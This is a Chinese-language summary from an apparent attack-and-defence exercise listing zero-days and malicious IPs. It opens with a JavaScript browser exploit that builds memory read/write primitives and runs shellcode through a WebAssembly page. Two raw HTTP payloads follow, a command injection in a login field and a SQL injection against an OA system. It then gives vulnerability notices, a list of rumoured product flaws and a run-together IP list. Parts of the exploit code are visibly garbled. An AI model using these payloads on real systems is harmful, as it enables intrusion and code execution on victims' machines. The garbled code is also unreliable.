HW第一天0day以及恶意IP简单汇总

在1.html当前路径下启动http server并监听80端口，修改hosts文件（测试写死的）
漏洞触发需让域名规则满足clientweb.docer.wps.cn.{xxxxx}wps.cn cloudwps.cn和wps.cn没有任何关系
<script>if(typeof alert === "undefined"){alert = console.log;}
let f64 = new Float64Array(1);let u32 = new Uint32Array(f64.buffer);
function d2u(v) {f64[0] = v;return u32;}function u2d(lo, hi) {u32[0] = lo;u32[1] = hi;return f64[0];}
function gc(){ // majorfor (let i = 0; i < 0x10; i++) {new Array(0x100000);}}
function foo(bug) {function C(z) {Error.prepareStackTrace = function(t, B) {return B[z].getThis();};let p = Error().stack;Error.prepareStackTrace = null;return p;}function J() {}var optim = false;var opt = new Function('a', 'b', 'c','if(typeof a==='number'){if(a>2){for(vari=0;i<100;i++);return;}b.d(a,b,1);return}' +'g++;'.repeat(70));var e = null;

J.prototype.'a', 'b' J.prototype. J.prototype.

new Function(use strict";b.a. new Function('a' new Function(


l(arguments,b);return arguments[a];'); a.b(0,a)');
'a', 'b','b.c();if(a){' +'g++;'.repeat(70) + '}');J.prototype.c = function() {if (optim) {var z = C(3);var p = C(3);z[0] = 0;e = {M: z, C: p};}};var a = new J();// jit optimif (bug) {for (var V = 0; 1E4 > V; V++) {opt(0 == V % 4 ? 1 : 4, a, 1);}}optim = true;opt(1, a, 1);return e;}
e1 = foo(false);e2 = foo(true);
delete e2.M[0];
let hole = e2.C[0];let map = new Map();map.set('asd', 8);map.set(hole, 0x8);
map.delete(hole);map.delete(hole);map.delete("asd");
map.set(0x20, "aaaa");let arr3 = new Array(0);let arr4 = new Array(0);let arr5 = new Array(1);let oob_array = [];oob_array.push(1.1);map.set("1", -1);
let obj_array = {m: 1337, target: gc};
let ab = new ArrayBuffer(1337);let object_idx = undefined;let object_idx_flag = undefined;
let max_size = 0x1000;for (let i = 0; i < max_size; i++) {if (d2u(oob_array[i])[0] === 0xa72) {object_idx = i;object_idx_flag = 1;break;}}
let dv = new DataView(ab);function get_32(addr) {let r8 = d2u(oob_array[bk_idx]);if (bk_idx_flag === 0) {oob_array[bk_idx] = u2d(addr, r8[1]);} else {oob_array[bk_idx] = u2d(r8[0], addr);}let val = dv.getUint32(0, true);oob_array[bk_idx] = u2d(r8[0], r8[1]);return val;}function set_32(addr, val) {let r8 = d2u(oob_array[bk_idx]);if (bk_idx_flag === 0) {oob_array[bk_idx] = u2d(addr, r8[1]);} else {oob_array[bk_idx] = u2d(r8[0], addr);}dv.setUint32(0, val, true);oob_array[bk_idx] = u2d(r8[0], r8[1]);}
function write8(addr, val) {let r8 = d2u(oob_array[bk_idx]);if (bk_idx_flag === 0) {oob_array[bk_idx] = u2d(addr, r8[1]);} else {oob_array[bk_idx] = u2d(r8[0], addr);}dv.setUint8(0, val);}
let fake_length = get_32(addrof(oob_array)+12);set_32(get_32(addrof(oob_array)+8)+4,fake_length);
let wasm_code = newUint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128, 128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128, 128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0 ,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);let wasm_mod = new WebAssembly.Module(wasm_code);let wasm_instance = new WebAssembly.Instance(wasm_mod);let f = wasm_instance.exports.main;
let target_addr = addrof(wasm_instance)+0x40;let rwx_mem = get_32(target_addr);//alert("rwx_mem is"+rwx_mem.toString(16));
const shellcode = new Uint8Array([0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89,0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30,0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff,0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52,0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01,0xd1,0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b,0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03,0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b,0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24,0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb,0x8d, 0x5d, 0x6a, 0x01, 0x8d, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x50, 0x68, 0x31, 0x8b,0x6f,0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x68, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5,0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a,0x00, 0x53, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x00]);
for(let i=0;i<shellcode.length;i++){
write8(rwx_mem+i,shellcode[i]);}f();</script>

POST /rep/login HTTP/1.1 Host: Cookie: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0 Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2 Accept-Encoding: gzip deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache14 Te: trailers Connection: close Content-Type:application/x-www-form-urlencoded Content-Length: 126 clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq

GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=1u7tsd1cpgp9qvco726smb50h5; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=779f3f46Upgrade-Insecure-Requests: 1

【2023.8.9】【情报-漏洞预警】【情报来源】：外部【漏洞类型】：二进制漏洞【漏洞危害】：高【情报简述】：BM SDK Java Technology Edition任意代码执行漏洞（CVE-2022-40609）【漏洞详情】：IBM Software Developers Kit（SDK）中文意思是IBM 软件开发工具包，包含开发工具和 Java™ 运行时环境。SDK 是可安装的 Java 包，其中包含 Java 应用程序编程接口（API）。行业监测到IBM SDK, Java Technology Edition中存在反序列化漏洞（CVE-2022-40609）。IBM SDK, Java Technology Edition中的对象请求代理 (ORB)易受不可信数据的反序列化漏洞影响，未经身份验证的远程威胁者可发送恶意序列化数据，利用该漏洞在目标系统上执行任意代码。【影响范围】：IBM SDK, Java Technology Edition<= 8.0.8.0IBM SDK, Java Technology Edition<=7.1.5.18 【处置方法】：目前该漏洞已经修复，受影响用户可升级到以下版本：IBM SDK, Java Technology Edition 8.0.8.5IBM SDK, Java Technology Edition7.1.5.19

漏洞名称：H3C多系列设备远程命令执行漏洞(QVD-2022-12205)漏洞等级：极危威胁类型：命令执行漏洞类型：命令注入CVE 编号：标签：影响十万级, 在野利用, 关键漏洞漏洞简述：H3C多系列设备存在远程命令执行漏洞。该漏洞是由设备Web控制台某接口存在的逻辑漏洞造成的。凭借此处漏洞即可获取到设备的终端完全控制权限（ROOT 权限）。公开日期：2023-08-08更新日期：2023-08-08 23:37:18

漏洞名称：通达OA 反序列漏洞(QVD-2023-18095)漏洞等级：高危威胁类型：代码执行漏洞类型：反序列化错误CVE 编号：标签：技术细节公开, 关键漏洞漏洞简述：通达OA 由于使用了存在了反序列化漏洞版本的yii框架导致存在反序列化漏洞，攻击者可利用此漏洞执行任意代码。公开日期：2023-08-04更新日期：2023-08-08 18:39:21

Exchange Server远程代码执行漏洞（CVE-2023-38182）风险通告 待补充poc exp描述和影响范围Exchange Server 2019 Cumulative Update 13Exchange Server 2019 Cumulative Update 12Exchange Server 2019 Cumulative Update 11Exchange Server 2016 Cumulative Update 23需要有普通用户权限

Airflow是一个开源的工作流自动化平台，它允许用户定义、调度和监视工作流任务的执行。RunTask是通过Airflow的Web界面或命令行工具。
在Airflow受影响版本中，RunTask功能允许用户手动触发执行特定的任务，而不受正常的任务调度和依赖关系限制。当用户没有执行某个特定任务的权限时，可以通过RunTask功能手动触发该任务的执行，从而绕过本应该实施的访问控制和依赖关系。攻击者可以通过RunTask功能，在目标服务器上执行任意代码。由于DAG定义了任务之间的依赖关系和执行顺序，攻击者可以通过RunTask绕过某些DAG的限制。
影响范围：apache-airflow@(-∞,2.6.0)

1、海康威视综合安防前台文件上传漏洞2、蓝凌OA前台代码执行漏洞3、致远M3Server-xxxx反序列化漏洞4、致远A8V8SP1SP2文件上传漏洞(1dav)5、普元EOS 前台代码执行漏洞6、金和OA sql注入7、泛微E-Mobile任意用户登录(1day)8、泛微E-Office10信息泄露后台+后台文件上传漏洞(Oday)很牛的组合漏洞9、契约锁电子签章系统RCE(1day)10、亿赛通电子文档平台文件上传漏洞11、ldocview命令执行漏洞12、jeesite代码执行漏洞Oday13、LiveBOS文件上传漏洞14、用友nc-cloud-任意文件写入15、qax VPN 0day16、xxIOA PWN17、xxx准入PWN18、sxf应用交付系统命令执行19、协同办公文档(DzzOfffice)未授权访问20、电子签章平台代码执行漏洞21、泛微oa进后台漏洞22、ucloud的未授权获取任意用户cookie23、飞书客户端RCE漏洞24、泛微EofficeV10前台RCE25、来客推商城任意文件上传26、天玥堡垒机Oday27、明御运维审计与风险控制系统堡垒机任意用户注册28、协同管理系统存在SQL注入29、泛微emobile注入漏洞30、拓尔思WCM任意命令执行漏洞31、用友财务云任意文件上传漏洞32、天眼0day(未证实)32、绿盟sas安全审计系统任意文件读取33、Smartbi身份认证绕过漏洞34、泛微Eoffice10 sql注入35、海康综合安防平台-Spring-ENV信息泄露-Restful api默认密钥漏洞36、宏景4个注入2个上传37、红帆OA一堆0day38、泛微E-office do_excel组件存在任意文件写入漏洞39、某御 Leadsec ACM管理平台SQL注入漏洞40、H3C CVM 前台任意文件上传漏洞41、通达OA登录认证绕过漏洞42、TRS-MAS 测试文件远程命令执行漏洞43、宝塔前台远程代码执行漏洞44、某恒数据大脑 API 网关任意密码重置漏洞45、通达OA系统V11.x版本远程代码执行漏洞46、华天动力OA系统前台任意文件上传漏洞47、PbootCMS v3.1.2 远程命令执行漏洞

121.40.127.235 203.56.198.5036.139.90.88111.30.232.23949.232.193.9161.52.4.110175.27.157.249162.14.108.14961.52.1.1878.130.114.73101.43.131.12482.156.151.10442.192.83.3536.139.93.155119.45.116.236118.195.135.8839.104.200.136123.56.94.91115.159.112.16639.100.74.747.92.204.7439.104.205.22547.106.193.231202.114.144.10661.171.119.10639.100.68.739.104.205.7647.99.153.17239.100.69.3239.100.67.4039.100.66.9239.100.67.439.100.71.24047.92.199.2151.13.9.165114.132.55.10939.100.67.168103.252.118.75117.176.227.58171.15.105.211182.92.222.186182.92.171.153101.200.121.24347.94.230.8842.229.37.9439.107.123.19761.181.206.5647.92.146.232180.103.125.4342.194.251.21047.92.193.10439.100.68.2039.100.74.17639.105.189.10049.234.66.241112.126.83.11147.92.222.21539.107.244.1839.98.253.124118.195.252.229101.200.127.65119.91.30.21639.104.22.16339.104.205.209118.195.163.139118.195.151.253118.178.233.24739.100.33.10647.92.153.182118.195.241.144106.55.107.10681.69.18.22847.92.117.14439.98.71.239.98.207.132119.45.197.19939.100.65.171122.230.40.42156.255.214.146115.55.5.25236.27.112.227128.90.186.6349.81.101.13339.144.230.42121.76.146.145115.227.53.22036.63.124.161139.214.148.34218.83.6.211106.58.246.13842.236.134.110220.201.59.247114.253.103.14727.202.246.11242.228.100.149103.225.84.4361.147.96.34219.156.23.17443.154.112.206125.83.104.172180.123.199.17180.125.235.203112.248.113.169113.252.145.146119.162.122.131111.201.175.156182.121.198.15643.137.9.153182.114.24.127125.109.150.118122.142.195.43112.248.244.57180.97.189.166183.27.124.9559.175.107.3458.153.134.157183.157.44.7661.54.61.238111.67.58.3542.238.153.542.239.10.26124.131.32.1142.3.201.56182.127.191.82115.57.30.175223.74.158.84183.27.118.73106.57.165.109219.155.86.248122.140.203.113220.187.194.231221.1.226.15860.246.68.18119.139.137.132182.121.53.223115.171.206.56123.118.11.71123.235.145.137115.60.49.192180.123.198.188180.97.189.153223.15.54.102180.97.189.156222.141.113.12614.18.105.198113.74.128.95122.230.40.5223.16.215.11742.240.129.52222.137.112.1142.225.48.25125.41.208.109211.101.236.135219.156.153.23918.162.213.61220.192.145.3142.3.201.20242.176.169.245106.110.134.12652.5.118.182185.254.37.216183.136.225.3139.144.228.147223.104.90.135117.61.1.151122.13.77.124119.4.175.235223.104.241.10111.196.58.23839.144.230.203120.216.234.6947.98.172.14447.110.180.3247.110.180.3347.110.180.3447.110.180.35124.77.171.243124.220.162.3642.84.161.64113.160.72.162192.241.222.93192.241.219.50142.93.54.16145.155.91.247205.210.31.3789.248.165.56121.254.147.246112.66.243.13245.137.116.6323.89.5.60104.131.128.14198.199.104.48103.224.212.221104.236.128.30103.224.212.220253.157.14.16545.55.35.5449.2.123.56138.68.133.118154.58.31.66199.254.199.244189.129.149.114118.89.58.55192.241.197.11190.211.252.504.2.2.2212.192.202.119192.241.196.10845.128.232.6283.35.39.231185.200.118.79103.137.63.117202.103.251.246146.19.191.108143.110.192.203190.210.152.14877.4.7.92146.148.34.1255.133.168.15111.192.102.213198.199.107.20196.10.89.62197.4.4.12162.243.136.62105.112.249.195185.200.118.67192.241.232.36112.248.62.247161.97.89.21054.76.135.1165.22.68.119183.136.225.3187.236.176.180107.148.149.146192.241.208.62178.128.227.20489.165.3.27185.200.116.72192.241.204.2649.93.164.238198.199.108.20249.129.46.48107.170.237.74107.170.237.73189.163.17.5185.85.188.62192.155.88.231189.146.237.7388.204.179.118199.254.199.225138.68.208.29190.12.59.131198.98.183.14487.236.176.151118.5.49.6198.199.105.6968.183.13.6189.248.163.20947.92.5.15837.139.129.26103.78.150.209188.5.4.9682.200.154.210162.243.136.42165.232.73.237189.163.152.29192.241.197.21120.78.171.322.57.149.93162.243.134.28